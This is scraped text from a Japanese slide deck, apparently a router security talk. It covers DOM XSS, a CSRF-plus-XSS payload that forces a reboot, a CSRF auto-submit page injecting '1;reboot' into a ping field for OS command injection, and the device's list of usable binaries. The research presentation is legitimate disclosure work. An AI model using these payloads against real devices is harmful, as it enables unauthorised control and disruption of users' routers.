More Related Content
More from abend_cve_9999_0001
More from abend_cve_9999_0001 (13)
The vulnerabilities never bothered me anyway
- 23. 23
3. DOM Based XSS
メールなどを用いて、XSSが発現するようなリンクを利用者
にアクセスさせ、JavaScriptの不備を悪用。サーバにログを残
さずに悪用可能。
メールやページ
書込みによるリン
ク
Application
Server
利用者
攻撃者
script
利用者のブラウザ上で実行
※ 一般的な説明
- 28. 28
リクエスト(通常時)は
POST /ap.html HTTP/1.1
Host: xxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
DeviceName=hostname&NetworkServiceEnable=1
<table class="AD_SET">
<tr>
<th>エアステーション名</th>
<td>
<input type="text" name="DeviceName" size="30" maxlength="64" value='hostname'>
</td>
</tr>
</table>
その結果を表示するレスポンス(抜粋)は
ここに出力される。
入力した内容
- 31. 31
アクセスしただけでrebootもできるようになる。
~抜粋~
<form name="frm" target="frame" action="http://xxxxx/ap.html"
method="POST">
<input type="hidden" name="DeviceName" value="host'></form><form
name='f' action='init.html' method='post'><input type='hidden'
name='nosave_reboot'
value='1'></form><script>document.f.submit();</script>">
<input type="hidden" name="NetworkServiceEnable" value="1">
</form>
- 38. 38
CSRF feat. OSコマンドインジェクション
で・・・<html>
<script>
function init(){
document.form[0].submit();
};
</script>
<body onload="init();">
<form action="http://xxxxxxxxxxx/ping.html" method="post">
<input type="hidden" name="ping_ipaddress" value="1;reboot">
</form>
</body>
</html>
脆弱性をついて再起動というイケてる仕様。
OSコマンドインジェクショ
ン
- 92. Analysis15
92
その結果、以下のコマンドが実行可能。
/bin
acl ap_serv ac ated ash brctl busybox cp cat chmod df dnsmasq dd date echo eraseall erase
gzip gpio grep hw_nat hostname iwconfig iwpriv iptables kill lld2d login ln ls mtr mv mtd_write
mknod mount mii_mgr mkdir netstat openssl ps ping pwd pidof rm reg sleep switch sh sed tc
touch tar uname umount uboot_env vi wscd
/sbin
arping basename cut ccf_checkLicenseStatus dumpleases ether-wake expr
ifilter_checkLicense.sh killall nslookup printf pscan tail top tproxy tftp test unzip uptime wget
wc xargs
/usr/bin
config-vlan.sh config.sh halt ifconfig init insmod klogd lsmod mdev pppoe-relay poweroff
reboot rmmod route syslogd udhcpc vconfig wd_keepalive